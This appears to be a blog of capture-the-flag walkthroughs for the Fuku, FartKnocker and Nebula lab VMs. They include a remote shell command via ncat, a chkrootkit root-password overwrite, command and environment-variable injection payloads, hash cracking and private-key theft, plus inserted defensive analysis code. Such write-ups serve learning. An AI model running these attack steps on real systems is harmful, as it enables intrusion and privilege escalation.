Walkthrough Fuku

I have just finished another VM. The very annoying, but fun, machine called Fuku. As in Fuck you, I guess. It was designed to really mess with the challenger.

Okay, so let’s get started.

So after scanning the machine I saw that all ports were open. But only ssh port 22 was a real service. I tried a few basic passwords on it, but I got blocked pretty fast. I am guessing some fail2ban service. The rest of the ports just output a FUKU note. So they were just false positives. So I wrote a python script to try out every port possible. But that wasn’t easy. First I wrote it to check for the return length. But that didn’t return anything. So that was quite annoying. And I also added multithreading to be able to check the ports faster:

from multiprocessing.dummy import Pool as ThreadPool  # a pool of threads, not processes
# testPorts(port) is the per-port probe from the rest of the script: connect, send a
# GET request and return the reply length. minArr is the list of port numbers to check.
pool = ThreadPool(2)                     # two worker threads
results = pool.map(testPorts, minArr)    # one probe per port, results in port order

So then I had to rewrite the script to make a GET request instead. Anyhow, I found the Joomla service on port 13370 after a lot of work. And I ran joomscan on it and found a lot of vulnerabilities. Especially a vulnerability that creates an admin-user for you. So I did that. Here is the exploit I used: https://www.exploit-db.com/exploits/6234/

The page was in Japanese, but it wasn’t that hard to create the admin-user. But once I was in it was really difficult to understand what was going on. I thought I changed the language so many times. And I tried to change it. At one point I thought English had been removed completely just for the sake of FUKU. But in the end I found it.

Then came the next challenge. How to upload a shell. I tried to turn off all forms of editors to be able to insert PHP, but nothing worked. So I tried to enable FTP, but that didn’t work since that port was already in use. I tried to upload a shell through the media uploads, but that blocked the code. So after some heavy googling on how to run PHP I ended up installing the DirectPHP plugin. This one: http://www.kksou.com/php-gtk2/joomla/directphp-plugin.php#download

So I uploaded my reverse-shell and got in.

The first thing I wanted to do was to spawn a shell:

$ python -c 'import pty; pty.spawn("/bin/sh")'
haha! FUKU! Only root can run that command.

That together with a few other commands was blocked. And since I couldn’t get a tty-shell I was unable to use sudo and su.

So I started to mess around with the mysql database. Which was quite difficult without a tty shell. It was really buggy. Oh yeah, I found the mysql login credentials in configuration.php in /var/www/html. So I looked around in the database fuku and found gizmo’s user. So I got the hash and cracked it with hashcat.

hashcat -m 11 -a 0 -o found.txt admin.hash <wordlist> -r /usr/share/hashcat/rules/rockyou-30000.rule
# -m 11 is hashcat's Joomla mode; the dictionary (<wordlist>, not shown in the post) is the positional argument and the rule file goes after -r

Only to find that gizmo used the same password for his user as for the database. sillyboy. So that was not so useful. There was also another admin-user and an admin-account in tacacs. “admin ht70zyjHsMl3A”.

So I transferred my enumeration script and started enumerating. I found that it was an Ubuntu 15.04 machine. So I figured I could try the standard overlay exploits that work on quite a few Ubuntus. But gcc was somehow blocked.

www-data@Fuku:/tmp$ gcc exp.c -o exp
gcc exp.c -o exp
haha! FUKU! Only root can run that command.

So I compiled the exploit on my machine and then did a wget to transfer it. But it wouldn’t run since www-data lacked certain rights.

Then I got stuck for quite some time. And I cheated a bit, just to read the word chkrootkit. So I found that program running and I looked for an exploit for it. And found this: https://www.exploit-db.com/exploits/33899/
Pretty crazy exploit. An incredible priv-esc exploit from a program that attempts to stop rootkits. So after some trial and error with using the exploit I finally just wrote:

echo "echo root:adminadmin | chpasswd" > update

And then I logged in using ssh. But that was after going a bit crazy in trying to get a tty-shell for www-data. So that was it. I got root and the flag.

Yep, this is a flag. It's worth over 9000 Internet points!
Random keyboard smash: lkhI6u%RdFEtDjJKIuuiI7i&*iuGf)8$d4gfh%4

In the root folder were all the programs and tools that I was blocked from using.

19700101      chkrootkit-0.49  flag.txt  g++-4.9  gcc-4.9  gcc-ar-4.9  gcc-nm-4.9  gcc-ranlib-4.9  ifconfig  mlocate    python     uname  whoami
change_ip.sh  cpp-4.9          fuku      gcc      gcc-ar   gcc-nm      gcc-ranlib  id              locate    portspoof  python2.7  which


I spent a lot of time writing the python script. So that was a good learning experience. Finding the chkrootkit was probably the hardest. I should have seen that it was an unusual service. All in all a really fun challenge! Thanks https://www.vulnhub.com/author/robert-winkel,190/ Robert Winkel for the machine! Frustrating but fun!

Walkthrough FartKnocker

Another VM is done. Here is the writeup. And here is the link to the VM on vulnhub.


$ netdiscover -r
   08:00:27:3d:0d:c8      1      60  Cadmus Computer System

The Nmap-scan.

Not shown: 65534 closed ports
Reason: 65534 resets
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:3D:0D:C8 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
TCP/IP fingerprint:

So port 80 is the only one open. An interesting little detail here is that it says that it found “65534 closed ports”, and then it says: Reason: 65534 resets. I think that means that the server has responded with RST/ACK. Something I learned in this challenge. But we will get to that.

On port 80 we find a file named pcap1.pcap. So I open it up in wireshark.
To the experienced packet inspector I guess it is quite obvious what is going on in this packet capture. But I had never heard about port knocking. So I got lost on a detour for quite some time. I was inspecting the ICMP packets. All of those packets ended with “!”#$%&'()*+,-./01234567”. Something that I thought was suspicious. So I started googling about hacks that use ICMP and found a lot.

It turns out that you can use the ICMP protocol to hide, or tunnel, other services. So I thought that someone had injected a Loki rootkit into the server, and what I was observing was the communication between the hacker (with ip …102) and the victim server. And that I was supposed to enter through the same exploit. But after going through the ICMP packets in detail I realized that they really were just pings, and nothing else. They never contained more data than the default “!”#$%&'()*+,-./01234567”, which I learned could be used to fingerprint the server. This data meant that the server probably was a Linux. So after discarding all the ICMP packets I started to look into the TCP packets more closely. And after some creative googling about ports I learned about port knocking.

Port knocking

So I downloaded knockd, that is used to implement port-knocking. And I got it to work by running this command:

knock 7000 8000 9000
nc 8888

This also worked:

for x in 7000 8000 9000; do nmap -Pn --host_timeout 201 --max-retries 0 -p $x; done
nc 8888

And this:

nc 7000
nc 8000
nc 9000
nc 8888

Anyways, it led me to this address: /burgerworld. I downloaded the pcap file and continued. I went through each and every packet in detail to understand how they all worked. But I am not going to bore you with that. So I right-clicked on a TCP packet and then clicked on follow tcp-stream. And it showed me a nice ascii image of beavis (or butthead, can’t remember who’s who). And the text: eins drei drei sieben. So I google-translated the text, and it was what I thought, the classic number 1337. So after trying every single possible combination of port knocking I finally figured out that it was supposed to be 1 3 3 7. And then nc to port 1337. There I found: /iamcornholio/ which gave me this text:

“huhhuhhh…Hey Beavis…Im all about uhhh…huhuh…that base huhhuhhh…

So the base-comment made me think that it was probably base64-encoded. And it was.

It translated into: Open up SSH: 8888 9999 7777 6666
So I knocked the port and got access to port 22.
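Both knock sequences on this box (7000 8000 9000 opens 8888, and 8888 9999 7777 6666 opens 22) are the kind of thing a knockd config describes, and the same logic can be run the other way round, over a log of SYN attempts, to see who completed a sequence. The code below is an added example, not from the walkthrough or from knockd; the reset-on-wrong-port and timeout semantics are my assumptions and the SYN events are constructed.

```python
"""Replay a SYN log against knockd-style knock sequences (added example).

The two sequences are the ones from this box: 7000 8000 9000 opens 8888 and
8888 9999 7777 6666 opens 22. The SYN events below are constructed.
"""
from collections import namedtuple

SynEvent = namedtuple("SynEvent", "time src dport")   # time in seconds

# name -> (knock ports in order, port that the sequence opens)
SEQUENCES = {
    "burgerworld": ((7000, 8000, 9000), 8888),
    "ssh": ((8888, 9999, 7777, 6666), 22),
}


class KnockDetector:
    """Track every source's progress through every sequence.

    Assumed knockd semantics: knocks must arrive in order, a knock to the
    wrong port resets the sequence (a correct first knock restarts it), and
    a gap longer than seq_timeout seconds between knocks also resets it.
    """

    def __init__(self, sequences, seq_timeout=5.0):
        self.sequences = sequences
        self.seq_timeout = seq_timeout
        self.state = {}   # (src, sequence name) -> (next index, time of last knock)

    def feed(self, event):
        """Consume one SYN; return the (name, opened port) pairs it completed."""
        completed = []
        for name, (ports, opens) in self.sequences.items():
            key = (event.src, name)
            idx, last = self.state.get(key, (0, None))
            if last is not None and event.time - last > self.seq_timeout:
                idx = 0                                    # too slow: start over
            if event.dport == ports[idx]:
                idx += 1                                   # expected port: advance
            else:
                idx = 1 if event.dport == ports[0] else 0  # wrong port: reset
            if idx == len(ports):
                completed.append((name, opens))
                idx = 0
            self.state[key] = (idx, event.time)
        return completed

    def run(self, events):
        """Replay events in time order; return {src: [(name, opened port), ...]}."""
        hits = {}
        for ev in sorted(events, key=lambda e: e.time):
            for hit in self.feed(ev):
                hits.setdefault(ev.src, []).append(hit)
        return hits


# Constructed sample: 10.0.0.5 knocks both sequences correctly, 10.0.0.6 knocks
# out of order, 10.0.0.7 knocks in order but leaves a 16 s gap before the last one.
SAMPLE_EVENTS = [
    SynEvent(0.0, "10.0.0.5", 7000), SynEvent(0.3, "10.0.0.5", 8000),
    SynEvent(0.6, "10.0.0.5", 9000), SynEvent(1.0, "10.0.0.5", 8888),
    SynEvent(2.0, "10.0.0.6", 7000), SynEvent(2.2, "10.0.0.6", 9000),
    SynEvent(2.4, "10.0.0.6", 8000),
    SynEvent(3.0, "10.0.0.7", 7000), SynEvent(4.0, "10.0.0.7", 8000),
    SynEvent(20.0, "10.0.0.7", 9000),
    SynEvent(30.0, "10.0.0.5", 8888), SynEvent(30.5, "10.0.0.5", 9999),
    SynEvent(31.0, "10.0.0.5", 7777), SynEvent(31.5, "10.0.0.5", 6666),
]


def knock_report(events=SAMPLE_EVENTS):
    """Which sources completed which sequence, e.g. {"10.0.0.5": [("burgerworld", 8888), ...]}."""
    return KnockDetector(SEQUENCES).run(events)


if __name__ == "__main__":
    for src, hits in knock_report().items():
        for name, port in hits:
            print(f"{src} completed sequence {name!r}, port {port} would open")
```

The same replay also explains the “65534 resets” line in the nmap output: a knock is just a SYN to a closed port, and the RST that comes back is all the knocker ever sees.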

$ ssh root@                                                   1 ↵
The authenticity of host ' (' can't be established.
ECDSA key fingerprint is SHA256:uSdkKIWXcJl0j0P5Y+cAzjD9CJOFQ/NxtG8kz8ptzFE.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '' (ECDSA) to the list of known hosts.
# USERNAME: butthead                       #
# PASSWORD: nachosrule                     #

So I logged in as butthead, but was immediately thrown out.

From doing some challenges on overthewire I learned that you can execute commands with SSH without getting an actual shell.

But first I downloaded sshpass to be able to make the process a bit easier, and then:

sshpass -p nachosrule ssh butthead@ ls

So then I used nc to get a permanent shell.

$ sshpass -p nachosrule ssh butthead@ "ncat -e /bin/sh 1234"


So I got a shell, and it was time to escalate.
I ran the LinEnum.sh script and waded through the info. And checked for vulns on sudo. But nothing really of interest. Some meaningless stuff in /tmp, some scripts in beavis. Then I found pcap3 and pcap4. That I studied thoroughly. In pcap4 I saw that there were some ssh key exchanges going on, and some encrypted data transfer. But after some googling I concluded that there is not really any way I could possibly break that. SSH with Diffie-Hellman seems pretty waterproof.

In the end I ended up running the Ubuntu 14 priv-exploit that I have used on some other VMs. This one: https://www.exploit-db.com/exploits/37292/. That exploit really is incredible/incredibly dangerous.

So I became root and got the SECRETZ in /root.


Packet-analysis really was awesome. A lot of fun and interesting stuff. I feel like I have really started to get a grip of how packets are structured, and started to get to know Wireshark a lot more. So the main takeaways from this VM really was learning packet-analysis and about port-knocking.

Thanks to top-hat-sec for another great VM!

After reading other writeups I learned about https://digi.ninja/projects/cewl.php. Which I am really excited about trying out. Gonna try it soon.

Nebula Walkthrough

I started doing the challenges in Nebula. They are not as fun as boot2root VMs but still entertaining. And I have learned some new stuff from it.
I have decided to write down all the levels in this one post, otherwise it would be too many short posts. So this is going to be a giant one, and sometimes way too much detail, and sometimes not enough, oh well. Let’s start.

Level 00

We just need to find the flag on this level.

$ find / -user flag00 -perm -4000 -exec ls -ldb {} \; 2>/dev/null
-rwsr-x--- 1 flag00 level00 7358 2011-11-20 21:22 /bin/.../flag00
-rwsr-x--- 1 flag00 level00 7358 2011-11-20 21:22 /rofs/bin/.../flag00

Search for user flag00, with permission 4000, executable. List the
output. Throw stderr in /dev/null.

cd /bin
cd "..."

Level 01

On this level we are provided with code written in C and the binary version of it. It can be found here: /home/flag01/flag01

$ file flag01
flag01: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped

So we know that it is a 32-bit setuid binary. So when we run the binary, the code gets executed as the user flag01.

total 13
drwxr-x--- 2 flag01 level01   92 2011-11-20 21:22 .
drwxr-xr-x 1 root   root     100 2012-08-27 07:18 ..
-rw-r--r-- 1 flag01 flag01   220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag01 flag01  3353 2011-05-18 02:54 .bashrc
-rwsr-x--- 1 flag01 level01 7322 2011-11-20 21:22 flag01
-rw-r--r-- 1 flag01 flag01   675 2011-05-18 02:54 .profile

Since I am a total noob in C I am going to comment this code pretty heavily to understand what is going on.

#define _GNU_SOURCE
// Needed so that unistd.h declares setresgid/setresuid on glibc.

#include <stdlib.h>
// This is what it says: C's standard library. Useful general-purpose functions:
// generating random numbers, conversions, memory allocation (malloc),
// process control. It is from this lib that "system" is taken.

#include <unistd.h>
// Provides access to the POSIX API.
// Gives the programmer access to the NULL pointer, and symbolic constants like SEEK_SET.

#include <string.h>
// A library for manipulating strings.

#include <sys/types.h>
// This library gives access to different data-types. Like gid_t.

#include <stdio.h>
// The standard input and output library.
// printf and scanf are among those functions. printf outputs, and scanf takes input.

int main(int argc, char **argv, char **envp)
// Here we define the main function, with three arguments.
// argc is the number of arguments. Argument count. The count starts from the
// calling of the binary. So ./flag01 is the first argument.
// argv are the arguments that the user inputs. In this program it appears to be none.
// envp is an array of the environment variables.
{
  gid_t gid;
  uid_t uid;
// Here we declare two variables, but we don't assign them any value.
// We use the data-types that come from the sys/types lib.
// The data-types are group-id and user-id.

  gid = getegid();
  uid = geteuid();

// This gets the effective group-id and user-id of the process. Because of the
// setuid bit that is flag01. And we assign the values to the previously created variables.

  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

// So this sets the real, effective and saved uid (and gid) to flag01's.

  system("/usr/bin/env echo and now what?");

// This uses the system function, which lets us run unix commands/programs through /bin/sh.
// env looks up "echo" in the PATH and runs it with the arguments "and now what?".
  return 0;
}


How can this then be exploited, since there is no user input?
So I figure that I can overwrite the echo command with a command that I call echo, but that does something else.

This kind of explains the way to do this.

So I wrote that program in bash


Then chmod +x echo, and export PATH=/tmp:$PATH. Now, it is important here to put /tmp (where the fake echo lives) at the beginning of the PATH variable, otherwise it will execute the normal echo.


We got the flag!

Level 02

So on this level we have another setuid to play with.

cd /home/flag02
level02@nebula:/home/flag02$ file flag02
flag02: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped

Let’s run it and see what happens.

level02@nebula:/home/flag02$ ./flag02
about to call system("/bin/echo level02 is cool")
level02 is cool

This looks a bit like the first level. But let’s analyze the code.

#define _GNU_SOURCE
// Needed so that unistd.h declares setresgid/setresuid and stdio.h declares asprintf.

#include <stdlib.h>
// Standard lib.

#include <unistd.h>
// Lib to get getegid()

#include <string.h>
// Lib to manipulate strings

#include <sys/types.h>
// Get new data-types, like gid_t

#include <stdio.h>
// Standard i/o. printf, scanf for example

int main(int argc, char **argv, char **envp)
{
  char *buffer;

// Declare the variable buffer.

  gid_t gid;
  uid_t uid;

// Declare variables.

  gid = getegid();
  uid = geteuid();

// Assign uid and gid into the created variables.

  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

// Set uid.

  buffer = NULL;

// Assign the value NULL to the buffer variable.

  asprintf(&buffer, "/bin/echo %s is cool", getenv("USER"));
// Let's break it down.
// asprintf auto-allocates memory, it doesn't have to receive a specific buffer-size.
// It acquires it dynamically. In a way it is a defence against buffer overflow, since
// the buffer can't be overflown because it is sized dynamically, I think.
// asprintf calculates the length of the string, allocates that amount of memory
// and then writes the string into that memory.

  printf("about to call system(\"%s\")\n", buffer);
  system(buffer);

// So, the asprintf takes the getenv username and inputs it into the buffer.
// Then we make a system call using that buffer.
  return 0;
}


Okay, so no user input is possible. So the solution will be elsewhere.
So we make a system call that is the following:
“/bin/echo username (taken from the env var) is cool”

So the solution that comes to mind is to insert a username that would be something like
the following: hello && /bin/bash # echo

So I set the username in my environment variable like this:

export USER="&& /bin/bash #"   # exported, so that flag02's getenv("USER") sees it

Then I ran the script, and it gave me the shell, and
then I could just run getflag.

Level 03

So on this level we have one file and one directory.

level03@nebula:/home/flag03$ ls -lah
total 5.5K
drwxr-x--- 3 flag03 level03  103 2011-11-20 20:39 .
drwxr-xr-x 1 root   root     180 2012-08-27 07:18 ..
-rw-r--r-- 1 flag03 flag03   220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag03 flag03  3.3K 2011-05-18 02:54 .bashrc
-rw-r--r-- 1 flag03 flag03   675 2011-05-18 02:54 .profile
drwxrwxrwx 2 flag03 flag03     3 2012-08-18 05:24 writable.d
-rwxr-xr-x 1 flag03 flag03    98 2011-11-20 21:22 writable.sh

The dir is read and writable. And the writable.sh-file looks like this:

#!/bin/sh

for i in /home/flag03/writable.d/* ; do
	(ulimit -t 5; bash -x "$i")
	rm -f "$i"
done

So here we can see that it takes all the scripts in writable.d and executes them, every few minutes, with a cronjob.
So after a lot of work, and a lot of testing. Like copying the sh and much other. I realized I didn’t have to get a shell, all I need is to execute getflag on the machine.

So I just wrote the following script:

getflag > /tmp/flaggan.txt

I also tried to copy the shell from the flag03-user and give me permissions to use it, but it didn’t work. Not really sure why. But anyways, I got the flag.

Level 04

This level requires you to read the token file, but the code restricts the files that can be read. Find a way to bypass it 🙂
To do this level, log in as the level04 account with the password level04. Files for this level can be found in /home/flag04.

#include <stdlib.h>
// Standard lib

#include <unistd.h>
// read() and write() come from here

#include <string.h>
// Lib to manipulate strings

#include <sys/types.h>
// Includes datatypes like gid_t

#include <stdio.h>
// Standard I/O

#include <fcntl.h>
// The file control options.
// To open files, close them, open dirs etc. O_RDONLY comes from here.

#include <err.h>
// err() comes from here: prints a message plus the errno text and exits.

int main(int argc, char **argv, char **envp)
{
  char buf[1024];
// Here the buffer. The buffer is a kind of intermediary between memory and program.
// So the buffer has a maximum of 1024 bytes. That is one kilobyte.

  int fd, rc;
// Here we declare two variables.

  if(argc == 1) {
    // What to do if there is only one cli-argument (just the program name).
      printf("%s [file to read]\n", argv[0]);
      exit(EXIT_FAILURE);
    // EXIT_FAILURE comes from stdlib.
    // This seems to be mostly harmless.
  }

  if(strstr(argv[1], "token") != NULL) {
    // So this fires only if the argument contains the word token.
    // strstr evaluates if the first argument contains the second one as a substring.
    // So we can't ever read any file whose given name contains the word token.
      printf("You may not access '%s'\n", argv[1]);
      exit(EXIT_FAILURE);
  }

  fd = open(argv[1], O_RDONLY);
  // Here we assign the fd variable.
  // It opens the file, in a read-only manner, and saves the file descriptor in
  // the variable fd.

  if(fd == -1) {
    // This statement fires if the file couldn't be opened (doesn't exist, no permission).
      err(EXIT_FAILURE, "Unable to open %s", argv[1]);
  }

  rc = read(fd, buf, sizeof(buf));

// So here we take the input file, and read it. The buffer-size is the limit.

  if(rc == -1) {
    // If the read fails it throws this error.
      err(EXIT_FAILURE, "Unable to read fd %d", fd);
  }

  write(1, buf, rc);
  // Here we write to standard out (the 1 indicates it).
  return 0;
}

I started trying to encode the file name and some other stuff, that didn’t work. Then it hit me. I can just create a link.

level04@nebula:/tmp/04$ ln -s /home/flag04/token ./test
level04@nebula:/tmp/04$ ls
test  test.sh
level04@nebula:/tmp/04$ /home/flag04/flag04 ./test

Wohoo, it worked!
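The symlink works because flag04 inspects the string in argv[1], not the file it ends up opening. The added example below (my code, not Nebula's) rebuilds the situation in a temporary directory on Linux and contrasts the naive substring check with two stronger ones: checking the resolved path, and opening with O_NOFOLLOW so a symlink as the final component is refused (the kernel reports ELOOP).

```python
"""Why the flag04 'token' substring filter fails, and what stronger checks look like.

Added example. It creates a throwaway directory with a file named token and a
symlink test -> token (the ln -s trick from the walkthrough), then runs three
checks against both names. Assumes Linux semantics for O_NOFOLLOW / ELOOP.
"""
import errno
import os
import tempfile


def naive_filter_allows(path):
    """The flag04 logic: strstr(argv[1], "token") on the string the user typed."""
    return "token" not in path


def resolved_filter_allows(path):
    """Check the canonical path (symlinks resolved) instead of the typed string.
    Still a check-then-open race, but it is not fooled by an alias name."""
    return "token" not in os.path.realpath(path)


def open_nofollow(path):
    """Open like flag04 does, but refuse a symlink as the final path component.
    Returns the file content, or None when the path is a symlink (ELOOP).
    Note: this guards only the last component; a symlinked parent directory or a
    hard link to the target is not caught."""
    try:
        fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)
    except OSError as e:
        if e.errno == errno.ELOOP:
            return None
        raise
    try:
        return os.read(fd, 1024)
    finally:
        os.close(fd)


def demo():
    """Run all three checks on the real file and on the symlink alias."""
    with tempfile.TemporaryDirectory(prefix="lvl04_") as d:
        token = os.path.join(d, "token")
        alias = os.path.join(d, "test")          # same name the walkthrough used
        with open(token, "w") as f:
            f.write("constructed-secret\n")       # constructed stand-in for the token
        os.symlink(token, alias)
        return {
            "naive_direct": naive_filter_allows(token),      # False: blocked
            "naive_alias": naive_filter_allows(alias),       # True: bypassed
            "resolved_alias": resolved_filter_allows(alias), # False: alias resolved
            "nofollow_alias": open_nofollow(alias),          # None: symlink refused
            "nofollow_direct": open_nofollow(token),         # the file content
        }


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name:16} -> {outcome!r}")
```

Neither fix is complete on its own: realpath() is still a check-then-open race, and O_NOFOLLOW only covers the last path component, so the robust version keeps the privilege drop and opens via the resolved path with the check done on the already-opened descriptor.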

Level 05

Check the flag05 home directory. You are looking for weak directory permissions
To do this level, log in as the level05 account with the password level05. Files for this level can be found in /home/flag05.

So I just read the files.

level05@nebula:/home/flag05/.backup$ tar -Oxf backup-19072011.tgz .ssh/id_rsa.pub

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDLAINcUvucamDG5PzLxljLOJ/nrkzot7EQJ9pEWXoQJC0/ZWm+ezhFHQd5UWlkwPZ2FBDvqxdcrgmmHT/FVGBjK0XWGwIkuJ50nf5pbJExi2SC9kNMMMP2VgY/OxvcUuoGhzEISlgkuu4hJjVh3NeliAgERVzxKCrxSvW48wcAxg4v5vceBra6lY7u8FT2D3VIsHogzKN77Z2g7k2qY82A0vOqw82e/h6IXLjpYwBur0rm0/u3GFB1HFhnAxuGcn4IsnQSBdQCB2S+eOUZ4PmiQ/rUSHuVvMeLCzrxKR+UG9zDwoCwwXpNJehAQJGCiL3JzBNnLjFaylSqKP6xj7cR user@wwwbugs
level05@nebula:/home/flag05/.backup$ tar -Oxf backup-19072011.tgz .ssh/id_rsa

Then I saved it down and sshed into the flag-user.

level05@nebula:/tmp/05/.ssh$ ssh -i id_rsa flag05@

Level 06

Old unix password config. Okay, I know that passwords were stored in /etc/passwd before they were stored in shadow.

cat /etc/passwd

Looks like it can be done with john the ripper.

So I just copy-pasted the hash into a file and then ran john on it like this

 $ john level06Hash
Using default input encoding: UTF-8
Loaded 1 password hash (descrypt, traditional crypt(3) [DES 128/128 AVX-16])
Press 'q' or Ctrl-C to abort, almost any other key for status
hello            (?)
1g 0:00:00:00 DONE 2/3 (2016-05-08 11:29) 2.777g/s 355.5p/s 355.5c/s 355.5C/s 123456..marley
Use the "--show" option to display all of the cracked passwords reliably
Session completed

So that was easy.

Level 07

This level was a bit tricky. It is about teaching command injection.
So these articles were really useful.

So we have a few files.
.lesshst – that is the history from the program less

level07@nebula:~$ cat .viminfo
# File marks:
'0  1  0  ~/index.cgi?Host=|getflag|
'1  1  0  ~/index.cgi

# Jumplist (newest first):
-'  1  0  ~/index.cgi?Host=|getflag|
-'  1  0  ~/index.cgi
-'  1  0  ~/index.cgi

# History of marks within files (newest to oldest):

> ~/index.cgi?Host=|getflag|
	"	1	0

And here is the cgi-code.


#!/usr/bin/perl

  use CGI qw{param};

  print "Content-type: text/html\n\n";

  sub ping {
    $host = $_[0];

    print("<html><head><title>Ping results</title></head><body><pre>");

    @output = `ping -c 3 $host 2>&1`;
    # $host goes straight into a shell command line: this is the command injection.
    foreach $line (@output) { print "$line"; }

    print("</pre></body></html>");
  }

  # check if Host set. if not, display normal page, etc

  ping(param("Host"));

I had never really looked at perl-code before. But it kind of made some sense I guess.

The config-file specified a port

# Specifies an alternate port number to listen on.

So I found that port, and started curling to see what I could run. After a lot of trial and error I found a way to do it:

curl "http://nebula.dev:7007/index.cgi?Host=www.google.com|getflag"
I also learned that you have to encode spaces correctly, otherwise the server will get all confused. So if you want to run any command with spaces you do it like this:

I had to encode the semicolon. That was the key to it!

Level 08

This is for sure my favorite level so far. I really enjoy analyzing packets.
So first I moved the pcap-file to my computer with netcat, and then I opened it up in wireshark.

There were no HTTP requests. So I guess this traffic was not on the web.

There are two machines talking: – 39247 – 12121

So looking at the packets we can tell that the machines are in Beijing, both of them. The source and destination coordinates show that they are in the same place.
After looking up the ports I found this:

12121 	tcp 	trojans 	Backdoor.Balkart (2004.09.02) - a backdoor trojan horse that can act as a HTTP proxy or FTP server

Port is also IANA registered for NuPaper Session Service 	SG
12121 	tcp,udp 	nupaper-ss 	NuPaper Session Service 	IANA
12121 	tcp 	threat 	Balkart

Even though it doesn’t really say in the challenge what kind of traffic this is, I like to imagine that it was someone who had infected the 12121 computer with the Balkart trojan. This one. But it doesn’t really matter, it is irrelevant for this challenge.

So I went over the packets and found some interesting ones.

 0000   ff fa 20 00 33 38 34 30 30 2c 33 38 34 30 30 ff  .. .38400,38400.
 0010   f0 ff fa 23 00 53 6f 64 61 43 61 6e 3a 30 ff f0  ...#.SodaCan:0..
 0020   ff fa 27 00 00 44 49 53 50 4c 41 59 01 53 6f 64  ..'..DISPLAY.Sod
 0030   61 43 61 6e 3a 30 ff f0 ff fa 18 00 78 74 65 72  aCan:0......xter
 0040   6d ff f0                                         m..

But I couldn’t piece it all together. So after analyzing every single packet separately, I realized that the packets come and go in a different order, an order that doesn’t make sense. So I learned something really useful. Right-click on a packet and then click on: follow, and then tcp-stream. This way we can see the full interaction, all packets combined into one.

..%..%..&..... ..#..'..$..&..... ..#..'..$.. .....#.....'........... .38400,38400....#.SodaCan:0....'..DISPLAY.SodaCan:0......xterm.........."........!........"..".....b........b....	B.
..............................1.......!.."......"......!..........."........"..".............	..
Linux 2.6.38-8-generic-pae (::ffff: (pts/10)

..wwwbugs login: l.le.ev.ve.el.l8.8
Password: backdoor...00Rm8.ate

Password: backd00Rmate
Login incorrect
wwwbugs login:

So the password looked pretty strange. And it didn’t work. But after I checked the tcp-stream in hex it became clear that the dots in the password were f7 in hex. f7 represents DEL. So every f7 was the user deleting letters. I guess he/she has problems remembering his/her own password.
So this:
Password: backdoor…00Rm8.ate
Became this:
Password: backd00Rmate
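Doing that reconstruction by hand works for one password, but the two things that make the raw stream hard to read (telnet option negotiation and the terminal's line editing) are both mechanical, so here is an added example that replays them; it is my code, not part of the Nebula material. The sub-negotiation bytes are copied from the hex dump above, the login keystrokes are constructed, and ASCII DEL (0x7f) stands for each deleted character.

```python
"""Reconstruct what a telnet user typed from the client->server byte stream.

Added example. Telnet option negotiation (IAC sequences) is stripped, then
line editing (DEL 0x7f / BS 0x08) is replayed so that the submitted lines come
out the way the server saw them. Sample stream is constructed; the
sub-negotiation prefix copies the SB/SE bytes from the level08 hex dump.
"""
IAC, SE, SB = 0xFF, 0xF0, 0xFA
WILL, WONT, DO, DONT = 0xFB, 0xFC, 0xFD, 0xFE
DEL, BS, CR, LF, NUL = 0x7F, 0x08, 0x0D, 0x0A, 0x00


def strip_negotiation(data: bytes) -> bytes:
    """Drop IAC command sequences and keep user data (IAC IAC is a literal 0xff)."""
    out = bytearray()
    i = 0
    while i < len(data):
        b = data[i]
        if b != IAC:
            out.append(b)
            i += 1
        elif i + 1 < len(data) and data[i + 1] == IAC:
            out.append(IAC)                               # escaped 0xff byte
            i += 2
        elif i + 1 < len(data) and data[i + 1] == SB:
            end = data.find(bytes([IAC, SE]), i + 2)      # sub-negotiation: skip to IAC SE
            i = len(data) if end < 0 else end + 2
        elif i + 1 < len(data) and data[i + 1] in (WILL, WONT, DO, DONT):
            i += 3                                        # command + option byte
        else:
            i += 2                                        # two-byte command (NOP, GA, ...)
    return bytes(out)


def replay_line_editing(data: bytes) -> list:
    """Apply DEL/BS the way the terminal did; return the lines the user submitted."""
    lines, buf = [], []
    for b in data:
        if b in (DEL, BS):
            if buf:
                buf.pop()                                 # one character rubbed out
        elif b == CR:
            lines.append("".join(buf))                    # Enter pressed
            buf = []
        elif b in (LF, NUL):
            continue                                      # CR LF / CR NUL line endings
        else:
            buf.append(chr(b))
    if buf:
        lines.append("".join(buf))                        # unfinished last line
    return lines


def typed_lines(client_stream: bytes) -> list:
    """Full pipeline: raw client->server bytes to the lines actually entered."""
    return replay_line_editing(strip_negotiation(client_stream))


# Option negotiation copied from the hex dump above, then constructed keystrokes.
NEGOTIATION = bytes.fromhex(
    "ff fa 20 00 33 38 34 30 30 2c 33 38 34 30 30 ff f0"              # SB TSPEED 38400,38400
    "ff fa 23 00 53 6f 64 61 43 61 6e 3a 30 ff f0"                    # SB XDISPLOC SodaCan:0
    "ff fa 27 00 00 44 49 53 50 4c 41 59 01 53 6f 64 61 43 61 6e 3a 30 ff f0"  # SB NEW-ENVIRON
    "ff fa 18 00 78 74 65 72 6d ff f0"                                # SB TERMINAL-TYPE xterm
    "ff fb 18"                                                        # WILL TERMINAL-TYPE (constructed)
)
SAMPLE_CLIENT_STREAM = (
    NEGOTIATION
    + b"level8\r\n"                                   # username, typed cleanly
    + b"backdoor\x7f\x7f\x7f00Rm8\x7fate\r\n"         # password with three DELs, then one more
)


if __name__ == "__main__":
    for line in typed_lines(SAMPLE_CLIENT_STREAM):
        print(repr(line))
```

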